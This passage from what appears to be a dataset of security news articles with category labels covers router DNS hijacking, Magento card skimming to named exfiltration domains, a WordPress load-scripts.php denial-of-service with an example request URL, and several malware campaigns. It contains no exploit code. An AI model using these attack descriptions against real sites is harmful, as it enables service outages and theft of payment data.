traffic from a legitimate websites to a malicious one controlled by hackers. The vulnerability might also affects other devices because it is located in the same, widely-used wireless router firmware used by different manufacturers. Bulgarian security researcher Todor Donev discovered the flaw which exists in a widely deployed ZynOS firmware from ZyXEL Communications Corporation, that is used in network hardware from TP-Link Technologies, ZTE and D-Link. According to the security researcher, D-Link's popular DSL2740R wireless router and a number of other D-Link routers, particularly the DLS-320B, are vulnerable. Late last year, similar router vulnerability was discovered in the web server ""RomPager"" from AllegroSoft, which is typically embedded into the firmware of routers, modems and other ""gateway devices"" from about every leading manufacturer. The flaw put 12 million homes and offices routers from a variety of different manufacturers vulnerable to DNS hijacking attack, which also included kit from D-Link, along with Edimax, Huawei, TP-Link, ZTE, and ZyXEL. The latest bug discovered in wireless routers running the vulnerable firmware could reveal their internal web servers to the open Internet, and according to an email from Donev, this could allow a remote attacker to configure the devices without authentication to access its administrative interface. Donev claimed that once attackers succeeded in modifying systems' DNS settings, they could perform a handful of malicious tasks, including: Redirecting unknown users to malicious sites – These sites could lead victim to a phishing page that could masquerade as a well-known site in order to trick users into handing out their personal and sensitive information. Replacing advertisements on legitimate sites – Hackers could manipulate ads that users see, replacing legitimate ads with malicious ones on the sites they visit. Controlling and redirecting network traffic – Hackers could also prevent users of infected systems from receiving important operating system updates and other software and security updates. Pushing additional malware – Attackers could directly push malware onto the infected systems. In order to exploit the router vulnerability, a malicious hacker would have to either be on the router's network or the wireless router would have to be publicly accessible. Now that administrative interface is exposed to the Internet, the risk of exploitation is higher. But even if the wireless router is accessible within the local area network, hackers can still use Cross-Site Request Forgery (CSRF), a technique which involves gaining access to local networks by sending specific HTTP requests to a LAN IP address that usually associates with the wireless router. Donev released the details of the D-Link wireless router vulnerability publicly without notifying the affected vendors. He has also published a proof-of-concept exploit for the D-Link DSL-2740R, a dual-function ADSL modem/wireless router device. As of now, this particular device has been discontinued from sale but is still supported. ",Vulnerability Google engineers Warn Of Serious Unpatched Adobe Reader Flaws,https://thehackernews.com/2012/08/google-engineers-warn-of-serious.html,"Adobe has missed dozens of vulnerabilities in Reader in this week's Patch Tuesday run according to Google engineers who reported the flaws. Sixteen vulnerabilities still affected the Windows and Mac OS X versions, while 31 critical and ""trivially exploitable"" bugs were found in the Linux application. Of particular concern to Google's Mateusz Jurczyk and Gynvael Coldwind are bugs in Reader for Linux, although other issues affect versions for Windows and OS X. For the Linux version, which went completely unpatched, Adobe and Google have been working together to counter 14 ""new unique crashes"" and nine ""test-cases"" that were potentially exploitable for remote code execution. When Adobe released a new version of Reader for Windows and Mac OS X earlier this week, it patched 12 vulnerabilities, but another 16 remained unpatched. Jurczyk and Coldwind decided to come forward with information on those flaws in the interest of user safety, as Adobe has no plans to issue additional out of band updates before 27 August. ""Considering that fixing the first twenty four crashes took twelve unique code fixes, it is expected that the remaining crashes might represent around eight more unique problems. Adobe plans to fix these remaining bugs and issue an update for the Linux version of Reader in an upcoming release,"" the Google researchers said. Adobe released new versions of Adobe Acrobat, Reader, Shockwave, and Flash to patch security holes in those products as well. Check out the details of the Microsoft and Adobe security bulletins to figure out which ones apply to you, and prioritize the patches that are most critical or have the greatest potential to impact your PCs. ",Vulnerability Why Protecting Your Magento Ecommerce Website Is So Damn Important,https://thehackernews.com/2015/04/Magento-website-security.html,"The Market of E-commerce websites is at its peak, as today people love to shop online to save their time. However, E-commerce and financial sites stand first in the rundown of potential victims as they manage financial exchanges. The traditional way to target victims of e-commerce sites is to use targeted ""phishing"" attacks via social media and emails. But… …due to increased awareness among the people about the threat of phishing attacks, hackers have now discovered new way — by malvertising legitimate websites where people assume to be safe and secure. We know: Today, there are many ready-to-use e-commerce platforms available on the Internet that are very easy to install and manage and that too at no extra cost; 'Magento' is one of the most popular out of them. The most popular, the most targeted: Yes! Security researchers at Sucuri have found a malicious code inside the Magento e-commerce website that was intended to send all the data submitted by a customer amid checkout procedure to a third-party site, here ""soulmagic .biz .fozzyhost .com/add."" Hackers have added 50 extra lines of code in the: app/code/core/Mage/Payment/Model/Method/Cc.php file inside the prepareSave() function, which you can see below: What actually happens behind the scene? Like most Magento sites, the site scanned by the researchers had a checkout form that asks for customers' credit card details. However, Magento encrypts this information and saves it, and sends it to the payment gateway in order to complete users' transaction. But, at the moment between the checkout form submission and encryption of the user's payment details when Magento handles customer's sensitive information in a plain text, the code injected by hackers send this unencrypted data to third-party address. Not only Magento sites are targeted: Researchers also found a very similar code being injected by hackers into the Joomla Donation extension in Joomla websites in order to send customers' credit card information to the hackers using ""java-e-shop .com/add."" Moreover, all e-commerce solutions, including CMS, plugin, and extension, are equally susceptible to this kind of cyber attack in the event they request customers' credit card details directly on a site, instead of redirecting them to a payment gateway. Because: It's so easy for a hacker to add a few lines of malicious code in the legitimate code of the website in an effort to dump customer's sensitive details to a noxious third-party. However, customers of online store aren't the only target, either: ""When hackers manage to compromise an e-commerce site, the owners of the website can be robbed too,"" researchers at Sucuri wrote. There are a known number of cases where hackers replace the PayPal account of website owner with their own account. As a result, every time a customer buys something, the site owner would ""never receive the funds."" The bottom line: Online Shoppers can protect themselves against this threat by following these steps: Don't enter your payment details on the websites that offer their own page. Instead prefer the sites that redirect you to a payment gateway provided by PayPal, payment gateway or bank to complete the transaction. Only use your Credit Cards with additional levels of authentication. Use payment cards that support additional security layers, like Visa 3-D Secure, or MasterCard SecureCode, or your bank's own 2FA service. Check the website for any security issue. This can be done by either surfing the Internet or simply check Google's SafeBrowsing information for the website using this link: https://www.google.com/safebrowsing/diagnostic?site=example.com, where example.com is the domain name of the site you want to check. Owners of E-commerce website can protect themselves against this threat by following these steps: Don't allow customers to process payment details on your site. Outsource the payments to trusted third-party service such as PayPal, Stripe or Google Wallet, so that if hackers compromise your site they cannot be able to steal your customers' credit card details. Use best practices with your website security, including strong and unique passwords for every element of your site, actively maintain and update your website firewall, and monitor your website for security issues. Be Proactive. If your website is hacked, get help immediately as you cannot put both your customers' money as well as your reputation at risk. ",Malware Unpatched DoS Flaw Could Help Anyone Take Down WordPress Websites,https://thehackernews.com/2018/02/wordpress-dos-exploit.html,"A simple yet serious application-level denial of service (DoS) vulnerability has been discovered in WordPress CMS platform that could allow anyone to take down most WordPress websites even with a single machine—without hitting with a massive amount of bandwidth, as required in network-level DDoS attacks to achieve the same. Since the company has denied patching the issue, the vulnerability (CVE-2018-6389) remains unpatched and affects almost all versions of WordPress released in last nine years, including the latest stable release of WordPress (Version 4.9.2). Discovered by Israeli security researcher Barak Tawily, the vulnerability resides in the way ""load-scripts.php,"" a built-in script in WordPress CMS, processes user-defined requests. For those unaware, load-scripts.php file has only been designed for admin users to help a website improve performance and load page faster by combining (on the server end) multiple JavaScript files into a single request. However, to make ""load-scripts.php"" work on the admin login page (wp-login.php) before login, WordPress authors did not keep any authentication in place, eventually making the feature accessible to anyone. Depending upon the plugins and modules you have installed, the load-scripts.php file selectively calls required JavaScript files by passing their names into the ""load"" parameter, separated by a comma, like in the following URL: https://your-wordpress-site.com/wp-admin/load-scripts.php?c=1&load=editor,common,user-profile,media-widgets,media-gallery While loading the website, the 'load-scripts.php' (mentioned in the head of the page) tries to find each JavaScript file name given in the URL, append their content into a single file and then send back it to the user's web browser. How WordPress DoS Attack Works According to the researcher, one can simply force load-scripts.php to call all possible JavaScript files (i.e., 181 scripts) in one go by passing their names into the above URL, making the targeted website slightly slow by consuming high CPU and server memory. ""There is a well-defined list ($wp_scripts), that can be requested by users as part of the load[] parameter. If the requested value exists, the server will perform an I/O read action for a well-defined path associated with the supplied value from the user,"" Tawily says. Although a single request would not be enough to take down the whole website for its visitors, Tawily used a proof-of-concept (PoC) python script, doser.py, which makes large numbers of concurrent requests to the same URL in an attempt to use up as much of the target servers CPU resources as possible and bring it down. The Hacker News has verified the authenticity of the DoS exploit that successfully took down one of our demo WordPress websites running on a medium-sized VPS server. ""It is time to mention again that load-scripts.php does not require any authentication, an anonymous user can do so. After ~500 requests, the server didn't respond at all any more, or returned 502/503/504 status code errors,"" Tawily says. However, attack from a single machine, with some 40 Mbps connection, was not enough to take down another demo website running on a dedicated server with high processing power and memory. But that doesn't mean the flaw is not effective against WordPress websites running over a heavy-server, as application-level attack generally requires a lot fewer packets and bandwidth to achieve the same goal—to take down a site. So attackers with more bandwidth or a few bots can exploit this flaw to target big and popular WordPress websites as well. No Patch Available – Mitigation Guide Along with the full disclosure, Tawily has also provided a video demonstration for the WordPress Denial of Service attack. You can watch the video to see the attack in action. Knowing that DoS vulnerabilities are out-of-scope from the WordPress bug bounty program, Tawily responsibly reported this DoS vulnerability to the WordPress team through HackerOne platform. However, the company refused to acknowledge the issue, saying that this kind of bug ""should really get mitigated at the server end or network level rather than the application level,"" which is outside of WordPress's control. The vulnerability seems to be serious because WordPress powers nearly 29 percent of the Web, placing millions of websites vulnerable to hackers and making them unavailable for their legitimate users. For websites that can't afford services offering DDoS protection against application-layer attacks, the researcher has provided a forked version of WordPress, which includes mitigation against this vulnerability. However, I personally wouldn't recommend users to install modified CMS, even if it is from a trusted source other than the original author. Besides this, the researcher has also released a simple bash script that fixes the issue, in case you have already installed WordPress. ",Vulnerability iScanner - Tool to detect and remove malicious codes and web page,https://thehackernews.com/2011/09/iscanner-tool-to-detect-and-remove.html,"iScanner - Tool to detect and remove malicious codes and web page iScanner is a free open source tool lets you detect and remove malicious codes and web page malwares from your website easily and automatically. iScanner will not only show you the infected files in your server but it's also able to clean these files by removing the malware code ONLY from the infected files. Current Features: Ability to scan one file, directory or remote web page / website. Detect and remove website malwares and malicious code in web pages. This include hidden iframe tags, javascript, vbscript, activex objects, suspicious PHP codes and some known malwares. Extensive log shows the infected files and the malicious code. Support for sending email reports. Ability to clean the infected web pages automatically. Easy backup and restore system for the infected files. Simple and editable signature based database. You can easily send malicious file to iScanner developers for analyzes. Ability to update the database and the program easily from iScanner's server. Very flexible options and easy to use. Fast scanner with great performance. Yes, it's FREE!! Download iScanner ",Malware Gazer: A New Backdoor Targets Ministries and Embassies Worldwide,https://thehackernews.com/2017/08/gazer-backdoor-malware.html,"Security researchers at ESET have discovered a new malware campaign targeting consulates, ministries and embassies worldwide to spy on governments and diplomats. Active since 2016, the malware campaign is leveraging a new backdoor, dubbed Gazer, and is believed to be carried out by Turla advanced persistent threat (APT) hacking group that's been previously linked to Russian intelligence. Gazer, written in C++, the backdoor delivers via spear phishing emails and hijacks targeted computers in two steps—first, the malware drops Skipper backdoor, which has previously been linked to Turla and then installs Gazer components. In previous cyber espionage campaigns, the Turla hacking group used Carbon and Kazuar backdoors as its second-stage malware, which also has many similarities with Gazer, according to research [PDF] published by ESET. Gazer receives encrypted commands from a remote command-and-control server and evades detection by using compromised, legitimate websites (that mostly use the WordPress CMS) as a proxy. Instead of using Windows Crypto API, Gazer uses custom 3DES and RSA encryption libraries to encrypt the data before sending it to the C&C server—a common tactic employed by the Turla APT group. Gazer uses code-injection technique to take control of a machine and hide itself for a long period of time in an attempt to steal information. Gazer backdoor also has the ability to forward commands received by one infected endpoint to the other infected machines on the same network. So far ESET researchers have identified four different variants of the Gazer malware in the wild, primarily spying on Southeast European and former Soviet bloc political targets. Interestingly, earlier versions of Gazer were signed with a valid certificate issued by Comodo for ""Solid Loop Ltd,"" while the latest version is signed with an SSL certificate issued to ""Ultimate Computer Support Ltd."" According to researchers, Gazer has already managed to infect a number of targets worldwide, with the most victims being located in Europe. Meanwhile, Kaspersky lab has also published almost similar details about Gazer backdoor, but they called it 'Whitebear' APT campaign. ",Cyber_Attack "Android Adware abusing permissions, Collecting more than they need",https://thehackernews.com/2012/10/android-adware-abusing-permissions.html,"So you just bought a new Android-based smartphone, what comes next? What else but the most exciting part downloading the right apps to boost its functionality. Android gives you the freedom to personalize your device, which has made it attractive to those who want their smartphones to be as unique as possible ""Many apps will ask you to grant them network access so they can download updates. Others seek permission to read your phone's state and identity so calls won't disrupt them from doing what they're doing. Unfortunately, these permissions can be abused for criminal intentions."" Trendmicro said in report. Before android applications was abusing permissions to access user's personal data, but now new generations of adware targeting Android smartphones are increasingly violating user privacy by grabbing personal information and using it without permission. Adware is software that is used to gather information about the users. This information is sent to advertising agencies who are the people who planted the adware in the first place. Adware displays an advertisement in the form of pop ups or text messages. When you click on the advertisement, you will be redirected to a browser that will open the link to the advertisers' site. When you visit the site, your data will be logged into the advertisers' server. We have no way of ensuring that adware is within its legal limitations while collecting data about you. The procedure is very simple. Although most adware is designed to collect some user information, the line between legitimate data gathering and violating privacy is starting to blur. The process becomes a privacy issue when app developers take more information than they originally asked for and then sell it to ad networks. Here is a list of the data leaked from the Android device and sent to the servers of the company behind this module: The device's IP address on all interfaces (i.e., both WiFi and mobile network) The device's ANDROID_ID (unique 64-bit identifier for the device) The Android OS version The user's location, as determined by GPS The user's mobile network and their country code The user's phone number The device's unique ID (their IMEI, MEID, or ESN) The device's manufacturer and version Based on information from MARS and Google Play, at least 7,000 free apps use this particular advertising module. 80% of them are still available, and at least 10% of them have been downloaded more than one million times. In addition to taking the user's personal information, these ads also display advertising in particularly annoying ways. Either notifications or an icon on the device's home screen are used to serve ads to users. Users should be careful about all mobile apps they download, wherever they come from. ",Malware ISPs Caught Injecting Cryptocurrency Miners and Spyware In Some Countries,https://thehackernews.com/2018/03/cryptocurrency-spyware-malware.html,"Governments in Turkey and Syria have been caught hijacking local internet users' connections to secretly inject surveillance malware, while the same mass interception technology has been found secretly injecting browser-based cryptocurrency mining scripts into users' web traffic in Egypt. Governments, or agencies linked to it, and ISPs in the three countries are using Deep Packet Inspection technology from Sandvine (which merged with Procera Networks last year), to intercept and alter Internet users' web traffic. Deep packet inspection technology allows ISPs to prioritize, degrade, block, inject, and log various types of Internet traffic, in other words, they can analyze each packet in order to see what you are doing online. According to a new report by Citizen Lab, Turkey's Telecom network was using Sandvine PacketLogic devices to redirect hundreds of targeted users (journalists, lawyers, and human rights defenders) to malicious versions of legitimate programs bundled with FinFisher and StrongPity spyware, when they tried to download them from official sources. ""This redirection was possible because official websites for these programs, even though they might have supported HTTPS, directed users to non-HTTPS downloads by default,"" the report reads. A similar campaign has been spotted in Syria, where Internet users were silently redirected to malicious versions of the various popular application, including Avast Antivirus, CCleaner, Opera, and 7-Zip applications bundled with government spyware. In Turkey, Sandvine PacketLogic devices were being used to block websites like Wikipedia, the sites of the Dutch Broadcast Foundation (NOS) and Kurdistan Workers' Party (PKK). ISPs Injected Cryptocurrency Mining Scripts Into Users' Web Browsers However, in Egypt, Sandvine PacketLogic devices were being used by a Telecom operator for making money by: Secretly injecting a cryptocurrency mining script into every HTTP web page users visited in order to mine the Monero cryptocurrency, Redirecting Egyptian users to web pages with affiliate ads. In Egypt, these devices were also being used to block access to human rights, political, and news outlets like Al Jazeera, HuffPost Arabic, Reporters Without Borders, and Mada Masr, as well as NGOs like Human Rights Watch. Citizen Lab researchers reported Sandvine of their findings, but the company called their report ""false, misleading, and wrong,"" and also demanded them to return the second-hand PacketLogic device they used to confirm attribution of their fingerprint. Citizen Lab started this investigation in September last year after ESET researchers published a report revealing that the downloads of several popular apps were reportedly compromised at the ISP level in two (unnamed) countries to distribute the FinFisher spyware. ",Cyber_Attack Microsoft to Issue 16 Security Patches and 60 Other Updates,https://thehackernews.com/2014/11/microsoft-to-issue-16-security-patches_9.html,"Microsoft has this time quite a big pile of security patches in its November 2014 Patch Tuesday, which will address almost 60 non-security updates for its Windows OS along with 16 security updates. The software giant released Advance Notification for 16 security bulletins, the most in more than three years, which will be addressed as of tomorrow, 11 November, 2014. Five of the bulletins have been marked as ""critical"", nine are ""important"" in severity, while two were labeled ""moderate."" The updates will patch vulnerabilities in Microsoft's various software including Internet Explorer (IE), Windows, Office, Exchange Server, SharePoint Server and the .NET framework as well. Five critical vulnerabilities affect specific versions of Microsoft Windows, including Windows 7, Windows 8, Windows RT, and Windows Server. One of them also affects Internet Explorer versions 7 through 11 as well. Four of the five critical bugs are said to allow remote code execution, meaning that successful hackers could hijack a system and install malicious softwares on the victim's machine, while the last could allow an attacker to gain administrative privilege on a vulnerable machine. ""A vulnerability whose exploitation could allow code execution without user interaction. These scenarios include self-propagating malware (e.g. network worms), or unavoidable common use scenarios where code execution occurs without warnings or prompts. This could mean browsing to a web page or opening email,"" is how Microsoft describes a critical patch. Another nine patches are rated as ""important"", which are not as severe as the critical ones but should still be installed in order to keep your systems safe. These affect Microsoft Windows, Office and Microsoft Exchange. Five of the nine important updates will patch ""elevation of privilege"" vulnerabilities, two others fix the OS security features bypass vulnerabilities, one addresses Remote Code Execution bug, while the other one plugs an information leak. Last two patches are rated as ""moderate"", which indicates a much lower risk, but should still be installed by the users. One of them addresses a denial of service flaw in Microsoft Windows, while the other patches an Elevation of Privilege bug. If you have Automatic Updates enabled on your machine, these fixes will all be made available via Windows Update and will be applied automatically for most users. But in case users have not enabled it, Microsoft is encouraging them to apply the updates promptly. Some patches applied may require restarting the servers as well. ",Vulnerability "Hackers breach Twitter and 250,000 accounts compromised",https://thehackernews.com/2013/02/hackers-breach-twitter-and-250000.html,"In recent The Hacker News updates, we have reported about some major hacking events and critical vulnerabilities i.e Cyber attack and spying on The New York Times and Wall Street Journal by Chinese Hackers, Security Flaws in UPnP protocol, Botnet attack hack 16,000 Facebook accounts, 700,000 accounts hacked in Africa and new android malware that infect more that 620,000 users. Today Twitter also announced that they have recorded some unusual access patterns that is identified as unauthorized access attempts to Twitter user data. Unknown hackers breach Twitter this week and may have gained access to passwords and other information for as many as 250,000 user accounts ""the attackers may have had access to limited user information – usernames, email addresses, session tokens and encrypted/salted versions of passwords"" said Bob Lord ,Director of Information Security, at Twitter. For security reasons twitter have reset passwords and revoked session tokens for these suspected compromised accounts. ""This attack was not the work of amateurs and we do not believe it was an isolated incident,"" he added. ""The attackers were extremely sophisticated and we believe other companies and organisations have also been recently similarly attacked."" Twitter have not mention that how hackers were able to infiltrate Twitter's systems, but Twitter's blog post alluded that hackers had broken in through a zero day vulnerability in Oracle's Java software. Some media portals also relate this attack to Hacktivist Anonymous Group incorrectly, because twitter itself no where mention anything about who is attacker! If you are not using good password hygiene, take a moment now to change your Twitter passwords. ",Cyber_Attack Critical Print Spooler Bug allows Attackers to Hack any version of Microsoft Windows,https://thehackernews.com/2016/07/printer-security-update.html,"Microsoft's July Patch Tuesday offers 11 security bulletins with six rated critical resolving almost 50 security holes in its software. The company has patched a security flaw in the Windows Print Spooler service that affects all supported versions of Windows ever released, which if exploited could allow an attacker to take over a device via a simple mechanism. The ""critical"" flaw (CVE-2016-3238) actually resides in the way Windows handles printer driver installations as well as the way end users connect to printers. The flaw could allow an attacker to install malware remotely on victim machine that can be used to view, modify or delete data, or create new accounts with full user rights; Microsoft said in MS16-087 bulletin posted Tuesday. Users who are logged in with fewer user rights on the system are less impacted than users who operate with administrative user rights, such as some home accounts and server users. Microsoft said the critical flaw could be exploited to allow remote code execution if an attacker can conduct a man-in-the-middle (MiTM) attack on a system or print server or set up a rogue print server on a target network. The critical flaw was discovered and reported by the researchers at security firm Vectra Networks, who disclosed some details on the vulnerability, but didn't publish their proof-of-concept (POC) code. You can watch the video that shows the hack in action: In corporate networks, by default network administrators allow printers to deliver the necessary drivers to workstations or systems connected to the network. These drivers are silently installed without user interaction and run with full privileges under the SYSTEM user. According to researchers, attackers can replace these drivers on the printer with malicious files that could allow them to execute code of their choice. More worrisome: If the printer is behind a firewall, attackers can even hack other device or computer on that particular network, and then use it to host their malicious files. Watering Hole Attacks via Printers Like servers, multiple computers are also connected to printers in an effort to print documents as well as download drivers. So, this flaw allows a hacker to execute watering hole attacks technically using printers. Watering hole attacks, or drive-by downloads, are used to target businesses and organizations by infecting them with malware to gain access to the network. ""Rather than infecting users individually, an attacker can effectively turn one printer into a watering hole that will infect every Windows device that touches it,"" said Vectra chief security officer Gunter Ollmann. ""Anyone connecting to the printer share will download the malicious driver. This moves the attack vector from physical devices to any device on the network capable of hosting a virtual printer image."" This flaw (CVE-2016-3238) is by far the most dangerous vulnerability of the year, which is easy to execute, provides different ways of launch attacks, and affects a huge number of users. A second related vulnerability, CVE-2016-3239, in MS16-087 bulletin is a privilege escalation flaw that could allow attackers to write to the file system. A security bulletin for Microsoft Office, MS16-088, includes patches for seven remote code execution (RCE) vulnerabilities, 6 of them are memory corruption flaws, which affects Microsoft Office, SharePoint Server as well as Office Web Apps. The flaws can be exploited by specially crafted Office files, allowing attackers to run arbitrary code with same privileges as the logged in user. Bulletin MS16-084 addresses flaws in Internet Explorer and MS16-085 in Microsoft Edge. The IE flaws include RCE, privilege escalation, information disclosure and security bypass bugs. Edge flaws include a handful of RCE and memory corruption flaws in the Chakra JavaScript engine, as well as an ASLR bypass, information disclosure, browser memory corruption, and spoofing bugs. Bulletin MS16-086 addresses a vulnerability in the JScript and VBScript engines in Windows, which could allow an attacker to execute remote code execution flaw, affecting VBScript 5.7 and JScript 5.8. Rest five bulletins rated as important address flaws in Windows Secure Kernel Mode, Windows Kernel-Mode Drivers, the .NET framework, the Windows Kernel, and Secure Boot process. Users are advised to patch their system and software as soon as possible. ",Vulnerability Another Master Key vulnerability discovered in Android 4.3,https://thehackernews.com/2013/11/another-master-key-vulnerability.html,"Earlier this year, in the month of July it was first discovered that 99% of Android devices are vulnerable to a flaw called ""Android Master Key vulnerability"" that allow hackers to modify any legitimate and digitally signed application in order to transform it into a Trojan program that can be used to steal data or take control of the device. The vulnerability was also responsibly disclosed to Google back in February by Bluebox and but the company did not fix the issue even with Android 4.3 Jelly Bean. Later, Google has also modified its Play Store's app entry process so that apps that have been modified using such exploit are blocked and can no longer be distributed via Play. Then after a few days, in the last week of July this year, Android Security Squad, the China-based group also uncovered a second Android master key vulnerability similar to the first one. Security researcher Jay Freeman has discovered yet another Master Key vulnerability in Android 4.3, which is very similar to the flaw reported by Android Security Squad in July. Jay Freeman, perhaps better known as Saurik for Cydia Software, an application for iOS that enables a user to find and install software packages on jailbroken iOS Apple devices such as the iPhone. He demonstrated the flaw with a proof of concept exploit, written in Python language. On Android, all applications are signed by their developers using private cryptographic keys; it is by comparing the certificates used to verify these signatures that Android's package manager determines whether applications are allowed to share information, or what permissions they are able to obtain. Even the system software itself is signed by the manufacturer of the device and the applications signed by that same key are thereby able to do anything that the system software can. Like the previous master key bugs, Saurik's exploit allows a hacker to gain complete access to your Android device via a modified system APK, with its original cryptographic key being untouched. This way the malware can obtain full access to Android system and all applications (and their data) with dangerous system permissions. Users are advised to download apps or app updates only from trusted sources, preferably from official sources or app stores. Saurik has also updated his Cydia Impactor for Android to include a patch for this bug. Recently, the source code for Android 4.4 was released in Android Open Source Project, which included a patch for all previously known Android Master Key vulnerabilities. Update: We have updated the story, and made some correction after Saurik comment, 'the bug I am describing is a bug in Android 4.3, not Android 4.4. The fix for it was included in the code release for Android 4.4, and since it is now disclosed there is no harm to the open device community to describe the bug in public; devices that currently have no exploit are there by now exploitable.' Thank you! ",Vulnerability GitHub Updates Policy to Remove Exploit Code When Used in Active Attacks,https://thehackernews.com/2021/06/github-updates-policy-to-remove-exploit.html,"Code-hosting platform GitHub Friday officially announced a series of updates to the site's policies that delve into how the company deals with malware and exploit code uploaded to its service. ""We explicitly permit dual-use security technologies and content related to research into vulnerabilities, malware, and exploits,"" the Microsoft-owned company said. ""We understand that many security research projects on GitHub are dual-use and broadly beneficial to the security community. We assume positive intention and use of these projects to promote and drive improvements across the ecosystem."" Stating that it will not allow the use of GitHub in direct support of unlawful attacks or malware campaigns that cause technical harm, the company said it may take steps to disrupt ongoing attacks that leverage the platform as an exploit or a malware content delivery network (CDN). To that end, users are refrained from uploading, posting, hosting, or transmitting any content that could be used to deliver malicious executables or abuse GitHub as an attack infrastructure, say, by organizing denial-of-service (DoS) attacks or managing command-and-control (C2) servers. ""Technical harms means overconsumption of resources, physical damage, downtime, denial of service, or data loss, with no implicit or explicit dual-use purpose prior to the abuse occurring,"" GitHub said. In scenarios where there is an active, widespread abuse of dual-use content, the company said it might restrict access to such content by putting it behind authentication barriers, and as a ""last resort,"" disable access or remove it altogether when other restriction measures are not feasible. GitHub also noted that it would contact relevant project owners about the controls put in place where possible. The changes come into effect after the company, in late April, began soliciting feedback on its policy around security research, malware, and exploits on the platform with the goal of operating under a clearer set of terms that would remove the ambiguity surrounding ""actively harmful content"" and ""at-rest code"" in support of security research. By not taking down exploits unless the repository or code in question is incorporated directly into an active campaign, the revision to GitHub's policies is also a direct result of widespread criticism that followed in the aftermath of a proof-of-concept (PoC) exploit code that was removed from the platform in March 2021. The code, uploaded by a security researcher, concerned a set of security flaws known as ProxyLogon that Microsoft disclosed were being abused by Chinese state-sponsored hacking groups to breach Exchange servers worldwide. GitHub at the time said it removed the PoC in accordance with its acceptable use policies, citing it included code ""for a recently disclosed vulnerability that is being actively exploited."" ",Malware WhatsApp-based wormable Android malware spotted on the Google Play Store,https://thehackernews.com/2021/04/whatsapp-based-wormable-android-malware.html,"Cybersecurity researchers have discovered yet another piece of wormable Android malware—but this time downloadable directly from the official Google Play Store—that's capable of propagating via WhatsApp messages. Disguised as a rogue Netflix app under the name of ""FlixOnline,"" the malware comes with features that allow it to automatically reply to a victim's incoming WhatsApp messages with a payload received from a command-and-control (C&C) server. ""The application is actually designed to monitor the user's WhatsApp notifications, and to send automatic replies to the user's incoming messages using content that it receives from a remote C&C server,"" Check Point researchers said in an analysis published today. Besides masquerading as a Netflix app, the malicious ""FlixOnline"" app also requests intrusive permissions that allow it to create fake Login screens for other apps, with the goal of stealing credentials and gain access to all notifications received on the device, using it to hide WhatsApp notifications from the user and automatically reply with a specially-crafted payload received from the C&C server. ""The malware's technique is fairly new and innovative,"" said Aviran Hazum, manager of mobile intelligence at Check Point. ""The technique here is to hijack the connection to WhatsApp by capturing notifications, along with the ability to take predefined actions, like 'dismiss' or 'reply' via the Notification Manager."" A successful infection could allow the malware to spread further via malicious links, steal data from users' WhatsApp accounts, propagate malicious messages to users' WhatsApp contacts and groups, and even extort users by threatening to leak sensitive WhatsApp data or conversations. The app has since been purged from the Play Store, but not before attracting a total of 500 downloads over the course of two months. FlixOnline also marks the second time a malicious app has been caught using WhatsApp to spread the malware. In January 2021, ESET researcher Lukas Stefanko disclosed a fake Huawei Mobile app that employed the same modus operandi to perform the wormable attack. What's more, the message displayed to users upon opening the apps is the same — ""We need your permission to access the application. It will help app (sic) to provide better functionality"" — suggesting the two apps could either be the work of the same attacker or that the authors of FlixOnline drew inspiration from the Huawei Mobile app. ""The fact that the malware was able to be disguised so easily and ultimately bypass Play Store's protections raises some serious red flags,"" Hazum said. ""Although we stopped one campaign of the malware, the malware family is likely here to stay. The malware may return hidden in a different app."" ""Users should be wary of download links or attachments that they receive via WhatsApp or other messaging apps, even when they appear to come from trusted contacts or messaging groups,"" Hazum added. ",Malware New Ransomware Malware takes Advantage of Windows PowerShell,https://thehackernews.com/2014/06/new-ransomware-malware-takes-advantage.html,"Ransomware is one of the most blatant and obvious money making schemes for cybercriminals and it was most likely to be known when last year Cryptolocker ransomware targeted millions of computers worldwide. Recently, security researchers at the Antivirus firm TrendLabs have unearthed another sophisticated variant of the ransomware malware which is employing Windows PowerShell in an effort to encrypt files on the victims' computer. The firm detected the variant as TROJ_POSHCODER.A. Windows PowerShell is a task automation and configuration management framework from Microsoft, consisting of a command-line shell and associated scripting language. It provides full access to COM and WMI, enabling administrators to perform administrative tasks on both local and remote Windows systems as well as WS-Management and CIM enabling management of remote Linux systems and network devices. It is believed that cybercriminals have used this feature of Windows just in order to make the detection and analysis of the malware harder on an affected system. However, they failed at this point as using Windows PowerShell feature made it much easier for the researchers to detect the malware. ""In this case, using PowerShell made it easier to detect as this malware is also hard-coded,"" reads the blog post. ""Decrypting and analyzing this malware was not too difficult, particularly compared to other ransomware variants."" TROJ_POSHCODER.A is a script-based malware as it is using the Windows PowerShell feature. The malware makes use of the Advanced Encryption Standard (AES) to encrypt the files, and RSA-4096 public key cryptography to exchange the AES key with the victims in order to decrypt the files. Once the ransomware is installed and executed on the victim's Windows System, it encrypts the existing files on the infected system and then renames them to {filename}.POSHCODER. In Addition, it also drops UNLOCKYOURFILES.html into every folder. As soon as all the files on the infected system are encrypted, it displays a message to victims saying ""Your files were encrypted and locked with a RSA4096 key"" and ask them to follow some given instructions in order to decrypt their files as shown in the screenshot: The instructions in the Ransom note takes users to another page as shown below, asking victims to download the Multibit application to have their own Bitcoin-wallet account for 1 Bitcoin. After victims purchase the application, they are instructed to fill and submit the form that contains information such as victims' email address, BTC address and ID, as a result to get decryption keys from the threat actors. This new variant have primarily affected English speaking targets in the United States. In our previous articles, we highlighted many variants of Cryptolocker and other similar threats that has ability to perform additional tasks such as using different languages in their warning and stealing virtual currency from cryptocurrency wallets. CryptoLocker is especially dangerous because of its infection rate and it is the most damaging Windows virus in a series of recent ransomware Trojans. We also reported last month that cybercriminals have now begun targeting Smartphones with a special piece of malicious software that locks up the devices until the victims pay a ransom to get the keys to unlock the phone, which highlights how money motivated criminals are continuously improving these threats over time. What Steps can you take to reduce the risk of your equipment becoming infected? Users are advised to never open email attachments from unknown sources and make backup of your important data to an external device or on the cloud storage. If you believe you have been infected, act quickly. Stay Safe! ",Malware North Korean Hackers Used 'Torisma' Spyware in Job Offers-based Attacks,https://thehackernews.com/2020/11/north-korean-hackers-used-torisma.html,"A cyberespionage campaign aimed at aerospace and defense sectors in order to install data gathering implants on victims' machines for purposes of surveillance and data exfiltration may have been more sophisticated than previously thought. The attacks, which targeted IP-addresses belonging to internet service providers (ISPs) in Australia, Israel, Russia, and defense contractors based in Russia and India, involved a previously undiscovered spyware tool called Torisma to stealthily monitor its victims for continued exploitation. Tracked under the codename of ""Operation North Star"" by McAfee researchers, initial findings into the campaign in July revealed the use of social media sites, spear-phishing, and weaponized documents with fake job offers to trick employees working in the defense sector to gain a foothold on their organizations' networks. The attacks have been attributed to infrastructure and TTPs (Techniques, 